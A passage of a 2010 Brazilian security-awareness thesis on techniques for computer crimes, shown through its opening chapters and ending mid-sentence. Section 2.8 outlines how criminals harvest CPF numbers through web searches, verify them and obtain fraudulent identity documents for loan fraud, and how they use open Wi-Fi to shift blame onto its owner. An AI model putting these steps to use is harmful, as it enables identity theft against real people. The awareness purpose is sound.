SlideShare a Scribd company logo
1 of 89
Download to read offline
FACULDADE DE
                                  TECNOLOGIA
                                  DE SÃO CAETANO DO SUL




       PEDRO RAMOS DE ALMEIDA JUNIOR




TÉCNICAS UTILIZADAS PARA PRÁTICA DE CRIMES DE
                INFORMÁTICA




       SÃO CAETANO DO SUL/SÃO PAULO
                   2010
PEDRO RAMOS DE AMEIDA JUNIOR




TÉCNICAS UTILIZADAS PARA PRÁTICA DE CRIMES DE INFORMÁTICA




                             Trabalho de Conclusão de Curso apresentado à
                             Faculdade de Tecnologia de São Caetano do Sul,
                             sob a orientação da Professora MSc Vanessa
                             Tatiana de Brito, como requisito parcial para a
                             obtenção do diploma de Graduação no Curso de
                             Segurança da Informação.




                 São Caetano do Sul / São Paulo
                             2010
Nome: ALMEIDA, Pedro Ramos de Junior.
     Título: TÉCNICAS UTILIZADAS PARA PRÁTICA DE CRIMES DE INFORMÁTICA.


Trabalho de Conclusão de Curso apresentado à Faculdade de Tecnologia de São Caetano do
                     Sul para obtenção do diploma de Graduação.




     Aprovado em:


                                 Banca Examinadora




     Prof. Dr. ou MSc. _____________________Instituição: _______________


     Julgamento: ________________Assinatura: ________________________


     Prof. Dr. ou MSc. _____________________Instituição: _______________


     Julgamento: _________________Assinatura: _______________________


     Prof. Dr. ou MSc ______________________Instituição: _______________


     Julgamento: ________________Assinatura: _________________________
DEDICATÓRIA



Dedico este trabalho a todos que de alguma forma
contribuíram para sua realização, minha mãe, às
pessoas    que,    voluntariamente,     divulgam
conhecimentos em prol do desenvolvimento
social e tecnológico e, principalmente, ao meu
avô Domingos Manha Ramirez (em memória) por
sua preocupação em tentar transmitir tudo o que
aprendeu ao longo da sua vida e fazer de mim
uma pessoa curiosa.
AGRADECIMENTOS



Agradeço à minha orientadora e Professora
Vanessa Tatiana de Brito, Prof. John Dale e
Professora Cirlei Izabel da Silva Paiva pelas
orientações na elaboração do trabalho. Também
devo agradecimentos a Aline Ramires de
Almeida, Alan Garcia, Bruno Honorio, Ana Luiza
Galhumi, Professora Maria Márcia Matos Pinto e
Professora Caroline Evangelista Lopes pelas
revisões textuais e dicas de conteúdo.
"Se o conhecimento pode criar problemas, não é através da ignorância que podemos
solucioná-los."
       Isaac Asimov.
ALMEIDA, Pedro Ramos Junior. Técnicas utilizadas para prática de crimes de
informática. Xxx folhas. Trabalho de Conclusão de Curso – Faculdade de Tecnologia de São
Caetano do Sul, São Caetano, 2010.


                                        Resumo


       Neste trabalho, são discutidas algumas das técnicas mais simples utilizadas para a
prática de crimes no âmbito computacional. A metodologia adotada foi a análise de exemplos
práticos de como alguns crimes são cometidos e a realização de experimentos com o objetivo
abordar as falhas tecnológicas relacionadas à área de segurança de informação. Este trabalho e
a adoção de tal metodologia justificam-se pela falta de consciência que muitas pessoas têm
sobre a necessidade de segurança das informações. O fato é que muitos nem mesmo fazem
atualizações de segurança sem saber que, mesmo sem documentos importantes, o computador
pode ser utilizado remotamente para diversas finalidades. A análise dos crimes feita nesta
monografia tem foco nos cometidos por pessoas que possuem conhecimento entre os níveis
básico e intermediário em informática. Dentre os crimes abordados, estão os de roubo, furto,
invasão de privacidade, falsidade ideológica, sequestro e até mesmo crimes hediondos. A
pesquisa utiliza-se de uma linguagem simplificada e acessível, explicando termos técnicos de
difícil entendimento para que, mesmo as pessoas que não estão acostumadas aos jargões da
área possam entender a necessidade de se proteger contra tais crimes, após descobrir com que
facilidade eles são cometidos. Os resultados obtidos pela demonstração da facilidade de se
cometer crimes de informática são as medidas de segurança que usuários de sistemas de
informática passarão a adotar e a conclusão de que, para se proteger, é necessário conhecer os
atacantes e as técnicas de ataque.


PALAVRAS-CHAVE: Crimes de informática; técnicas hacker/cracker; conscientização;
segurança de informação.
ALMEIDA, Pedro R. J. Techniques used for computer crimes. Xxx pages. Completion of
coursework – São Caetano do sul College of Technology, São Caetano, 2010.


                                          Abstract


       In this paper, are discussed some of the simplest techniques used to commit crimes
within computing. The adopted methodology was the analysis of practical examples of how
some crimes are committed and the conducting experiments with the objective to broach the
technological failures in the information security. This work and the adoption of such methods
are justified by the lack of awareness that some people have about the importance of
information security. The fact is that some people do not make security updates without
knowing that, even without important documents, the computers can be used remotely by a
cracker for different purposes. The analysis of the crimes that are done in this paperwork has
focused on those ones committed by people who do not have experience with computers and
people who have basic knowledge. Among the crimes broached in this paper are theft,
invasion of privacy, forgery, kidnapping and other crimes. The research makes use of a
simplified and accessible language, explaining difficult technical terms so that even people
who are not accustomed to jargon can understand the necessity of protection against such
crimes after discovering how easily they are committed. The results gotten from the
demonstration of the easiness of committing computer crimes are the security measures that
users of computer systems will take and the conclusion that, to protect the computers systems,
it is necessary to know the aggressors and the attack techniques.


KEYWORDS: Computer Crimes; hacker/cracker techniques; awareness; information
security.
Lista de ilustrações


Figura 1 Principal obstáculo para a implementação de segurança .................................. 20
Figura 2 Resultados da pesquisa para o termo "CPF: " Mario ....................................... 21
Figura 3 Tela de recuperação retirada do DVD do Windows Vista.................................. 28
Figura 4 Prompt de comando (cmd.exe) renomeado para “sethc.exe” ............................ 30
Figura 5 Alteração da senha ................................................................................................. 31
Figura 6 Obter propriedade de arquivo .............................................................................. 32
Figura 7 Obter propriedade de arquivo (2) ….................................................................... 32
Figura 8 Obter propriedade de arquivo (3) ........................................................................ 33
Figura 9 Obtendo permissões ............................................................................................... 33
Figura 10 Tela do Windows Millennium ............................................................................. 34
Figura 11 Opções para alterar o sistema Windows ............................................................ 36
Figura 12 Opções para alterar senhas dos usuários .......................................................... 37
Figura 13 Finalização do processo de exclusão de senha ................................................... 38
Figura 14 Obter arquivos “SAM” e “system” com o sistema em execução ..................... 39
Figura 15 Utilização do Cain ................................................................................................ 40
Figura 16 Força bruta com o Cain ...................................................................................... 41
Figura 17 Crackeando .......................................................................................................... 42
Figura 18 Senhas das redes sem fio já acessadas ............................................................... 43
Figura 19 Brutus ................................................................................................................... 44
Figura 20 Wordlist ................................................................................................................. 44
Figura 21 Quebra de senha de e-mail .................................................................................. 45
Figura 22 Invasão de site ...................................................................................................... 46
Figura 23 Screenshots do batch ............................................................................................ 50
Figura 24 Compilar batch ..................................................................................................... 51
Figura 25 Executar de forma invisível …............................................................................ 53
Figura 26 Incluir quaisquer arquivos ao programa …....................................................... 54
Figura 27 Incluir ícone …...................................................................................................... 54
Figura 28 Comparação de arquivos …................................................................................ 55
Figura 29 Redirecionamento do site …................................................................................ 56
Figura 30 Salvar site …......................................................................................................... 58
Figura 31 Página WEB completa …..................................................................................... 59
Figura 32 Site falso …............................................................................................................ 59
Figura 33 Anonymail …........................................................................................................ 61
Figura 34 Achilles ….............................................................................................................. 64
Figura 35 Configurar proxy …............................................................................................. 65
Figura 36 Dados de agência e conta corrente …................................................................. 67
Figura 37 Dados capturados …............................................................................................ 68
Figura 38 Teclado virtual …................................................................................................. 68
Figura 39 Tela de interceptação de dados do cliente …...................................................... 69
Figura 40 Tela de alerta ….................................................................................................... 70
Figura 41 Interfaces ….......................................................................................................... 72
Figura 42 Habilitar modo monitor ….................................................................................. 73
Figura 43 Airodump-ng ….................................................................................................... 73
Figura 44 Salvar pacotes capturados ….............................................................................. 74
Figura 45 Resultados do ataque PTW …............................................................................. 75
Figura 46 Autenticação falsa …............................................................................................ 76
Figura 47 Modificar o MAC …............................................................................................. 76
Figura 48 Criar e enviar pacotes forjados …...................................................................... 77
Figura 49 Enviando pacotes forjados ….............................................................................. 78
Figura 50 Capturar dados de ponto de acesso e canal específico …................................. 79
Figura 51 Verificar clientes conectados …........................................................................... 79
Figura 52 Capturando handshake …................................................................................... 80
Figura 53 Descobrir senha …................................................................................................ 81
Figura 54 Senha encontrada …............................................................................................ 81
Sumário

1 Introdução ........................................................................................................................... 13
    1.1 Objetivos ..................................................................................................................... 14
2 Conceitos básicos e definições ........................................................................................... 16
    2.1 Crime ........................................................................................................................... 16
    2.2 Distinções entre hacker e cracker; hackerismo e crackerismo................................. 16
    2.3 Firewall ........................................................................................................................ 18
    2.4 “Laranja” .................................................................................................................... 18
    2.5 Segurança em ambientes corporativos ..................................................................... 18
    2.6 Conscientização .......................................................................................................... 19
    2.7 Obtenção de dados ..................................................................................................... 20
    2.8 Como os criminosos escolhem um “laranja” ........................................................... 21
    2.9 Exemplos reais de crimes ........................................................................................... 23
         2.9.1 Incidentes envolvendo bancos ........................................................................... 24
         2.9.2 Invasões ............................................................................................................... 24
         2.9.3 Sequestro ............................................................................................................. 25
3 Técnicas e conhecimentos básicos ..................................................................................... 26
   3.1 Engenharia social ........................................................................................................ 26
   3.2 Outras formas de ligar o computador ....................................................................... 27
   3.3 Obter acesso completo a sistemas Windows protegidos por senha ......................... 29
         3.3.1 Senhas do Windows 95,98 e Millennium .......................................................... 34
         3.3.2 Senhas do Windows NT e 2000 ......................................................................... 34
         3.3.3 Senhas do Windows XP, 2003, Vista e 7 ........................................................... 35
         3.3.4 Descobrir senhas sem alterá-las ........................................................................ 38
               3.3.4.1 Senhas armazenadas no computador ..................................................... 42
               3.3.4.2 Invasão de contas de e-mail e sites por meio da senha .......................... 43
4 Técnicas que demandam conhecimentos básicos ............................................................ 47
    4.1 Criação de um programa para fins maliciosos ........................................................ 47
         4.1.2 Arquivos de processamento em lote (batch) ..................................................... 47
              4.1.2.1 Como compilar um arquivo de processamento em lotes ....................... 50
         4.1.3 Como um vírus pode ser anexado a outro arquivo ......................................... 51
    4.2 DNS spoofing .............................................................................................................. 55
4.3 Fraude em contas bancárias ...................................................................................... 57
        4.3.1 Pharming ............................................................................................................. 57
        4.3.2 Phishing scam e e-mail spoofing ........................................................................ 61
        4.3.3 Man In The Middle (MITM) e sequestro de sessão ......................................... 63
    4.4 Quebra de senhas de redes sem fio ........................................................................... 71
        4.4.1 Captura de tráfego ............................................................................................. 71
        4.4.2 Como quebrar senhas WEP .............................................................................. 74
              4.4.2.1 Como fazer autenticação falsa e acelerar o tráfego ............................... 76
        4.4.3 Descoberta de senhas WPA/WPA2 ................................................................... 78
    4.5 Computadores “zumbis” ........................................................................................... 83
        4.5.1 Ataque DdoS ....................................................................................................... 83
        4.5.2 Outros tipos de ataques feitos por computadores “zumbis” .......................... 85
5 Considerações finais ........................................................................................................... 86
6 Referências bibliográficas ................................................................................................. 87
13




   1 Introdução


       Este estudo tem como intento descrever como alguns crimes de informática podem ser
cometidos por pessoas que não possuem conhecimentos avançados na área. Muito se tem
afirmado que é um “mito” a necessidade de aprender técnicas de ataque para poder se
defender com eficiência (RUFINO, 2002), porém, pesquisas mostram que a quantidade de
crimes cometidos pela internet cresce em ritmo acelerado (CERT.BR, 2010) e levam a crer
que os atuais mecanismos de segurança adotados não são eficientes ou suficientes. Segundo
pesquisas atuais, o principal fator responsável pelo grande número de problemas relacionados
à segurança da informação é a má utilização das tecnologias (FECOMERCIO, 2010), e uma
das medidas consideradas mais eficientes no combate aos incidentes é a conscientização dos
usuários (RODRIGUES, 2010).
       Um profissional que atua em um seguimento completamente distinto da informática,
dificilmente possui conhecimentos avançados para manipular regras de firewall, configurar
seu antivírus de forma eficiente, saber quais ações tomar quando ameaças são encontradas,
verificar cabeçalhos de e-mails e saber quais são confiáveis, ou ainda, deduzir com destreza
em quais locais ele pode ou não clicar.
       Para uma pessoa que, não necessariamente precisa entender a fundo os sistemas
computacionais a fim de realizar as funções correlatas à sua profissão, como um médico,
advogado, metalúrgico, ou, até mesmo, pessoas que utilizam computadores com frequência,
mas não necessitam de conhecimentos avançados para desempenhar suas funções, como
secretárias ou gerentes de empresas, o estudo de meios técnicos utilizados para uma proteção
eficiente pode causar enfado e não ser eficiente na prevenção de incidentes. Considerando
como correta a conclusão de que é mais eficiente apontar as fragilidades nos processos do que
apenas aconselhar usuários sobre boas práticas de segurança, neste trabalho são discutidos
alguns crimes que podem ser cometidos com certa facilidade, incidentes que ocorrem com
frequência, mas são encobertos para não denegrir a imagem de empresas e, é feita uma
tentativa de demonstrar que nem sempre se deve confiar veementemente em sites que exibem
mensagens dizendo serem cem por cento seguros ou em processos e programas que não
levantam suspeitas.
       Devido ao rápido avanço da tecnologia, muitas das ferramentas que exploram as
vulnerabilidades, técnicas de ataque e brechas de segurança aqui discutidas, certamente
ficarão obsoletas com o passar do tempo e não mais poderão ser usadas. Porém, assim como
14



ainda hoje é possível explorar falhas e brechas existentes desde o começo da era da
informática, possivelmente, muitos anos ainda serão necessários para que este trabalho se
torne totalmente desatualizado, principalmente no que diz respeito à principal brecha de
segurança hoje existente: as falhas humanas.
       É fato que as ferramentas e técnicas utilizadas por criminosos que atuam na área de
informática evoluíram desde o surgimento dos primeiros computadores; no entanto, as
técnicas de defesa também evoluíram de forma considerável.
       Com a utilização de boas ferramentas de proteção e configurações bem elaboradas, a
maior brecha de segurança passa a ser a fraude ou erro humano. Para mitigar riscos oriundos
de falhas humanas, dois fatores são de extrema importância: o treinamento e a
conscientização. Com a falsa ideia que algumas pessoas têm sobre a frequência com que os
crimes de informática são cometidos e sobre o nível de conhecimento necessário para cometê-
los, convencer alguém sobre a necessidade de adotar medidas de segurança, em alguns casos,
torna-se um desafio.


         1.1 Objetivos


       O objetivo principal deste trabalho é demonstrar que, para aumentar o nível de
segurança de informações em ambientes domésticos ou corporativos, a divulgação de técnicas
que são utilizadas para a prática de crimes de informática pode servir como uma forma de
defesa e um recurso para conscientizar pessoas sobre a necessidade de se proteger dos
incidentes de informática. Até mesmo em jornais televisivos são dados conselhos de como
utilizar os computadores com mais segurança; porém, ainda há pessoas que não têm medo de
se expor totalmente em sites de relacionamento interpessoal, ou mesmo fazer transações
bancárias em computadores cheios de vírus. Neste trabalho, a tentativa de conscientização é
feita de uma forma diferente e que pode ser muito eficiente, que é demonstrar, com exemplos
práticos, como é fácil, a partir de um computador, cometer atos que podem trazer sérias
consequências para qualquer pessoa que utiliza a internet no seu cotidiano. Além de objetivar
ajuda no trabalho de profissionais que atuam na área de segurança de informação e que
precisam convencer as pessoas da necessidade de proteção, o conteúdo aqui expresso pode ser
de grande valia também para usuários domésticos que se sentem seguros somente por deixar
de acessar sites de bancos ou por não possuir arquivos importantes armazenados em seus
computadores.
15



       Outro objetivo importante é discutir um conhecimento erroneamente escondido,
proibido em alguns sites e, muitas vezes, não transmitido nem mesmo em cursos de segurança
de informação, que é o conhecimento utilizado para prática de crimes de informática.
Atualmente, a divulgação de técnicas hacker/cracker é feita de uma maneira que somente
pessoas interessadas no assunto, competentes administradores de redes, bons programadores
ou criminosos conseguem tais informações. Em outras palavras, tal como acontece com o
acesso às armas de fogo, apenas as pessoas mal intencionadas ou uma minoria de curiosos e
pessoas com boas intenções detêm tais informações.
       Não faz parte dos objetivos deste trabalho a divulgação de conhecimentos para serem
utilizados a fim de prover prejuízo alheio ou cometer qualquer forma de fraude, mesmo
porque, as técnicas aqui utilizadas não são destinadas a crackers ou usuários avançados, pois
estes, possivelmente já possuem conhecimento de técnicas melhor elaboradas e mais
eficientes.
16



2. Conceitos básicos e definições


       Para melhor entender as ideias apresentadas e evitar interpretações errôneas, torna-se
necessário esclarecer alguns termos e palavras que são usadas constantemente neste trabalho,
não só para auxiliar pessoas de outras áreas e que não estão acostumadas com a linguagem
utilizada no mundo da informática, mas também para evitar interpretações diferentes por
pessoas já familiarizadas com alguns termos.


     2.1 Crime


       Na primeira edição do dicionário Aurélio, podemos encontrar a seguinte definição para
a palavra crime: “violação culpável da lei penal; delito” (1989, p.187). Neste trabalho, é
tratada como crime, não só a transgressão penal ou ação antijurídica que vai contra as leis
brasileiras ou internacionais vigentes, mas também qualquer ato praticado intencionalmente e
que pode trazer consequências sociais ou pessoais desastrosas ou nefastas. Um dos motivos
para a adoção de tal definição é devido às leis vigentes ainda não contemplarem muitos dos
atos maléficos que podem ser praticados no mundo digital. Para julgar a maioria dos crimes
de informática, ainda são utilizadas leis antigas para casos novos. Por exemplo, para punir
crimes como os de visualização de mensagens eletrônicas alheias, utilização de dados
incorretos para preenchimento de formulários digitais e, mediante artifício ou ardil, ludibriar
pessoas pela internet para benefício próprio com prejuízo alheio, são utilizadas as leis de
invasão de privacidade, falsidade ideológica e estelionato, respectivamente. A adoção de leis
específicas para punir crimes digitais é motivo de grande discussão, atualmente, no Brasil.


    2.2 Distinções entre hacker e cracker; hackerismo e crackerismo


       Um equívoco frequentemente cometido por pessoas de diversas áreas não correlatas à
informática é referir-se a um cracker e utilizar o termo “hacker”. Baseando-se na origem do
termo, o hacker pode ser considerado como, dentre outras coisas, um bom programador, um
experto em eletrônica ou um bom conhecedor de sistemas computacionais. Sobre o cracker,
não é frequente que haja discórdia nas definições para o termo, tornando o significado da
palavra pouco menos claro se comparado ao hacker. Ainda não é comum que definições para
o termo sejam encontradas em dicionários (principalmente os brasileiros), porém, é possível
17



encontrar em alguns específicos de informática. Segundo Carlos Eduardo Morimoto,
                               Existem duas definições diferentes para este termo.
                               Na primeira, o cracker é um vândalo virtual, alguém que usa seus
                       conhecimentos para invadir sistemas, quebrar travas e senhas, roubar dados [..]
                               Uma segunda definição, mais branda, é alguém que quebra travas de
                       segurança de programas e algoritmos de encriptação, seja para poder rodar jogos
                       sem o CD-ROM, ou gerar uma chave de registro falsa para um determinado
                       programa, quebrar as travas anti-cópia [SIC] usadas em alguns softwares, quebrar o
                       sistema de encriptação do DVD (este último realmente importante, pois permitiu que
                       os usuários do Linux e outros sistemas não Windows pudessem assistir DVDs). Ou
                       seja, nesta segunda definição o Cracker é alguém na margem da lei, cujas ações
                       ainda são ilegais, embora muitas vezes eticamente justificáveis (os usuários têm
                       direito a fazer cópias de CDs legalmente comprados, tem [SIC] direito de assistir
                       DVDs no Linux e assim por diante)   (2002, p.134).


       Enfatizando as afirmações de Morimoto, é possível dizer que as definições que
encontramos para o termo cracker não costumam ser muito diferentes umas das outras, visto
que, quem não conhece as diferenças entre um hacker e um cracker, como muitos jornalistas
não especializados em notícias de informática, frequentemente referem-se ao cracker e
utilizam o termo “hacker”. O termo “hacker” pode ainda ser ramificado em diversas outras
terminologias como o Black hat, White hat, Phreaker, Coder e várias outras, dependendo do
tipo de hacker. Tais terminologias não são utilizadas neste documento, portanto, não há
necessidade de explicá-las para o entendimento do conteúdo.
       No dicionário de internet e informática, de Márcia Regina Sawaya, os hackers são:
“programadores tecnicamente sofisticados, que dedicam boa parte de seu tempo a conhecer,
dominar e modificar programas e equipamentos.” (1999, p. 208).
       Há uma imensa quantidade de dicionários e sites na internet que definem estes termos,
portanto, estabelecer uma definição exata é algo complexo. Segundo Morimoto, “a confusão é
tanta que existem casos de livros e mesmo filmes legendados, onde o termo "Cracker" é
substituído por "Hacker" pelo tradutor, sem a menor cerimônia.”(2002, p.198).
       Para evitar interpretações equivocadas neste trabalho, devem ser levadas em conta as
seguintes definições para quando são citadas as palavras hacker, hackerismo, cracker e
crackerismo:
       Hacker: Pessoa com elevado conhecimento técnico em determinada área (no caso
deste trabalho, conhecimento em informática);
18



       Hackerismo: Corrente ou doutrina que um hacker segue;
       Cracker: Perito em informática que, muitas vezes, utiliza-se de seu conhecimento para
praticar ações criminosas e/ou que vão contra as leis penais;
       Crackerismo: Corrente ou doutrina que um cracker segue.


  2.3 Firewall


       Esta palavra, cuja tradução literal é “parede de fogo”, será bastante utilizada no texto,
portanto, seu entendimento é fundamental para a perfeita compreensão do conteúdo.
       O firewall pode ser um software que, após ser instalado e configurado em um
computador, tem a função de bloquear acessos e conexões suspeitas ou previamente
bloqueadas. Além de um software, um firewall pode ser um componente dedicado
exclusivamente para analisar o tráfego e controlar os acessos que são permitidos ou não. Em
médias e grandes empresas, são utilizados equipamentos cuja única função é a de firewall, o
que evita a lentidão na rede e permite maior precisão no controle de acesso.
       A definição abaixo, além de breve e simples, permite o entendimento básico do
conceito de firewall.
       "Programa ou componente dedicado, que protege a rede contra invasões externas e
acessos não autorizados.” (MORIMOTO, 2002, p.181).


 2.4 “Laranja”


       Não foi encontrada nenhuma outra palavra mais formal e que não tenha sentido
figurado para reproduzir fielmente o significado deste termo.
       Quando a palavra “laranja” é mencionada nesta pesquisa, ela tem o seguinte
significado: Indivíduo, nem sempre ingênuo, que ajuda, de forma involuntária ou não, com
seu nome e/ou dados pessoais, na concretização de um crime, recebendo o ônus total ou
parcial.


 2.5 Segurança em ambientes corporativos


       O nível de segurança implantada em uma empresa deve ser diretamente proporcional
19



ao valor de seus ativos e o grau de risco a que eles estão expostos. No mercado, podemos
encontrar diversas soluções de segurança voltadas para o ambiente corporativo que
incrementam a segurança dos sistemas. Muitas vezes, tais soluções são realmente necessárias,
porém, tratadas como opcionais. A maioria das técnicas apresentadas neste trabalho,
consideradas técnicas de lammers ou script kiddies (iniciantes), podem ser facilmente
bloqueadas com soluções simples. Dos iniciantes, geralmente, apenas uma boa configuração é
suficiente para se prevenir, o que não exige a aquisição de programas ou equipamentos.
       A segurança em empresas (mesmo nas pequenas) deve ser diferenciada. Para manter a
segurança nas empresas, algumas medidas genéricas, básicas e importantes são:
       -Aquisição e atualização periódica de antivírus corporativo;
       -Configuração personalizada de firewall;
       -Atualização dos programas e sistemas operacionais da empresa;
       -Adoção de políticas de segurança e conscientização de funcionários.
       As medidas supracitadas são recomendadas a qualquer tipo e porte de empresa.
Medidas adicionais, entretanto, podem e devem ser tomadas de acordo com a realidade de
cada empresa.
       Devido às técnicas avançadas e requintadas que alguns criminosos utilizam, somente
instalar um antivírus e manter o computador atualizado não são medidas que garantam a
segurança de nossas redes.


   2.6 Conscientização


       A conscientização dos usuários domésticos e corporativos sobre a necessidade de
tomar medidas que garantam a segurança dos sistemas é, indubitavelmente, o maior desafio
encontrado para garantir a integridade, confidencialidade e disponibilidade de informações.
Tal afirmação pode ser comprovada com dados de diversas pesquisas, como a Décima
pesquisa nacional de segurança de informação feita pela empresa de segurança “Módulo
Security Solutions”. Na figura abaixo, extraída desta pesquisa, é possível verificar os dados de
aproximadamente 600 questionários presenciais e on-line, nos quais foram ouvidos
profissionais da área de tecnologia e segurança de informação, distribuídos pelos diversos
setores da economia. Os dados correspondem à metade das mil maiores empresas brasileiras.
20



       Principal obstáculo para a implementação de segurança. Figura 1.




Fonte: Módulo Security Solutions (2002, p.7).


  2.7 Obtenção de dados


       Um dos fatores que mais possibilitam pessoas mal intencionadas cometerem crimes de
informática é a exposição de dados. Há diversos dados que um criminoso pode utilizar para
cometer um crime. Com o auxílio de um computador, muitos deles podem ser encontrados
como: dados cadastrais que circulam livremente na internet, identificações únicas em
processadores e placas de rede, logs (arquivos que armazenam dados sobre o que acontece em
um sistema), histórico de navegação, cookies (documentos de texto armazenados pelos
navegadores), lista de documentos recentes, mensagens de comunicadores instantâneos e até
mesmo documentos do pacote de programas Microsoft Office que armazenam informações
sobre quem criou o documento (THOMPSON, 2004).
       Atualmente, uma das melhores formas de se conseguir informações são os sites de
busca na internet. Através deles, é possível obter informações das mais diversas sobre várias
pessoas que nem imaginam ter seu nome exposto na internet Estas informações são
frequentemente oriundas de cadastros feitos em sites ou, até mesmo, cadastros feitos em
estabelecimentos físicos.
       Não são só dados cadastrais que circulam pela internet. Segundo Rafael Sbarai em um
artigo publicado na revista Veja, em abril de 2010, o Facebook, uma das maiores redes sociais
21



do mundo (supera a marca de 400 milhões de usuários), em sua décima sétima mudança nas
políticas de privacidade, tornou públicos os dados de todos os seus usuários. Dentre as
informações contidas nestes dados estão: nome, profissão, cidade, lista de amigos e álbum de
fotos. Ainda de acordo com a reportagem, as autoridades de proteção de dados da União
Europeia consideraram esta abertura como “inaceitável” (SBARAI, 2010).
        Além das fontes já citadas, também é possível encontrar informações de alto valor em
sites         como:           http://telelistas.net/,         http://www.previdenciasocial.gov.br/,
http://www.detran.sp.gov.br/,             http://www.registro.br/,          http://www.whois.net/,
https://registro.br/cgi-bin/whois/ e muitos outros.


   2.8 Como os criminosos escolhem um “laranja”


        A escolha de um “laranja” é extremamente útil para um criminoso cometer diversos
tipos de crimes tornando-se requisito básico para quem não quer ser descoberto.
        Há diversos métodos de se escolher um” laranja”. Uma das formas mais simples é
utilizar sites de busca na internet para conseguir dados de pessoas com o nome limpo. A
quantidade de dados e a facilidade de obtê-los possibilitam ao criminoso escolher até mesmo
que nome ele quer utilizar.
        No exemplo a seguir, foi utilizado um navegador comum para entrar no site
“www.google.com.br” e, supondo que o criminoso tenha escolhido um nome comum como
“Mario”, foi digitado o seguinte: "CPF: " Mario.


        Resultados da pesquisa para o termo "CPF: " Mario. Figura 2
22



       Na imagem anterior é possível observar que, logo nos três primeiros resultados da
busca, o criminoso pode achar algo que possivelmente lhe interesse. O primeiro resultado
mostra até mesmo o endereço (além do CPF) de um Mário que possivelmente mora em Minas
Gerais. No segundo, é possível verificar um site do governo federal divulgando informações
pessoais de diversas pessoas para, literalmente, quase o mundo inteiro. No terceiro resultado,
mais uma vez é possível visualizar o nome, CPF e endereço de outra pessoa que se chama
Mario. Após a rápida obtenção destes dados, o criminoso pode entrar no site
“http://www.receita.fazenda.gov.br/aplicacoes/atcta/cpf/consultapublica.asp” e verificar a
situação cadastral do CPF para não correr o risco de ter algum insucesso ao cometer fraudes
devido a problemas com o documento.
       Com o nome completo da pessoa e outros dados pessoais, muitas vezes é possível
encontrar em outros sites diversas informações do futuro “laranja”. Caso o criminoso queira ir
mais além, pode escolher um “laranja” que tenha mais ou menos sua idade (preferencialmente
de outro estado), fazer um boletim de ocorrência passando-se pelo “laranja” em alguma
delegacia dizendo que foi assaltado e teve todos os seus documentos roubados, e começar a
providenciar, legalmente, novos documentos. O criminoso pode conseguir uma certidão de
nascimento em um cartório e, levando em consideração que a carteira de identidade é de
responsabilidade dos governos estaduais e válida em todo o território nacional, de posse da
certidão de nascimento e quatro fotos, a pessoa com más intenções pode tentar fazer a carteira
de identidade em algum estado que não adotou o novo documento com chip e banco de dados
integrado de impressões digitais (SIQUEIRA, 2010).
       Após conseguir documentos como RG, CPF e certidão de nascimento, todos eles
expedidos por órgãos oficiais, é possível obter ainda mais documentos, alugar
temporariamente uma casa, abrir conta em banco, obter empréstimos, fazer compras e,
posteriormente, descartar todos os documentos do “laranja” e voltar para seu estado de origem
com os bens adquiridos, agindo como se nada tivesse acontecido. Possivelmente, a pessoa
lesada só irá perceber o que aconteceu quando for investigar o motivo de seu nome estar
“sujo”. Mesmo se conseguir provar que não fez compras ou pegou empréstimos, terá muitos
problemas para reparar todo o dano causado.
       Com o exemplo acima é possível concluir que, se nenhum site na internet tratasse
dados pessoais como se fossem informações públicas, o criminoso não teria tanta facilidade
para agir. O exemplo também permite afirmar que não é necessário um elevado conhecimento
em informática para utilizar a tecnologia como ferramenta principal, na hora de cometer um
23



crime.
         Outras artimanhas menos conhecidas também podem ser utilizadas para escolher um
“laranja” a fim de realizar de crimes difíceis de serem investigados.
         Muitas pessoas compram equipamentos como dispositivos de rede sem fio e apenas
ligam o aparelho, preservando as configurações originais de fábrica. Por padrão, a grande
maioria desses dispositivos não possui qualquer configuração de segurança como, por
exemplo, uma senha de acesso. Uma pessoa com conhecimentos superficiais de informática
pode, sem dificuldade alguma, utilizar a conexão que o dono do aparelho possui com a
internet e praticar atividades como, por exemplo, acessar sites de pornografia infantil. Neste
caso, o acesso pode ser rastreado pela polícia e, a pessoa que primeiramente será encontrada é
a dona do equipamento sem fio. Mesmo se for definida uma senha para acesso lógico ao
equipamento, uma pessoa com conhecimentos intermediários em redes sem fio pode
facilmente descobrir a senha se ela não for complexa e de um padrão de tecnologia
(protocolo) seguro. Mesmo uma pessoa que não possui equipamentos de rede sem fio, mas
mantém seu computador desatualizado, muitas vezes com vírus, também pode, com grande
facilidade, tornar-se um “laranja” tendo seu computador invadido.
         Outra forma de se utilizar um “laranja”, bastante verificada em empresas, é realizar
um procedimento chamado e-mail spoofing. Esta técnica consiste em forjar um e-mail, muitas
vezes com um remetente que é conhecido da pessoa que recebe. Um exemplo de como esta
técnica pode ser utilizada é um criminoso utilizar o endereço de e-mail de algum funcionário
de uma empresa, passando-se por ele, e tentar obter alguma informação que poucas pessoas
conseguiriam.


   2.9 Exemplos reais de crimes


   Os crimes de informática, dos mais brandos aos mais nefastos, acontecem com grande
frequência em vários países e empresas com diferentes níveis de segurança. A grande maioria
das pessoas não dá a importância devida às notícias ou, muitas vezes, nem fica sabendo delas.
Os bancos, por exemplo, não costumam divulgar seus incidentes de segurança por razões
óbvias – quem confiaria seu dinheiro a um banco declaradamente inseguro? –, porém, é
possível encontrar diversos relatos pessoais e não formais. Por exemplo, se a frase ”Caixa
eletrônico do Banco invadido por hackers”, for digitada no campo de busca do maior site de
compartilhamento de vídeos do mundo, será mostrado um vídeo onde há um caixa eletrônico
24



de uma instituição financeira brasileira de grande porte com a imagem de uma mulher nua.
Uma suposta vítima de fraude filmou o caixa eletrônico e narrou o fato possivelmente
ocorrido.
   Para dar mais credibilidade às hipóteses e exemplos citados ao longo deste trabalho, foram
extraídas de jornais respeitados, tribunais de justiça e revistas, algumas notícias que podem
confirmar as afirmações do parágrafo acima.


     2.9.1   Incidentes envolvendo bancos


   O banco Bradesco S/A foi condenado pelo Tribunal de Justiça de Minas Gerais a indenizar
um advogado que sofreu uma invasão cracker e teve um prejuízo de R$ 8.626,31. O
advogado obteve direito de ressarcimento do valor, além de uma indenização por danos
morais no valor de R$ 5.800. Assim que percebeu algo de errado com sua conta, o advogado
contatou o gerente do banco e foi informado de que nada poderia ser feito. O advogado então
registrou um boletim de ocorrência, notificou oficialmente a agência e, segundo ele, o banco
não respondeu aos apelos. Em sua defesa, o banco Bradesco declarou que a vítima
possibilitou que terceiros tivessem acesso à sua senha de uso pessoal e intransferível, além de
declarar que o sistema de segurança do banco é infalível (TRIBUNAL DE JUSTICA DE MINAS
GERAIS, 2010).

   Um cracker brasileiro de 24 anos foi preso no dia 04/06/2010 após pedir US$ 500 mil a
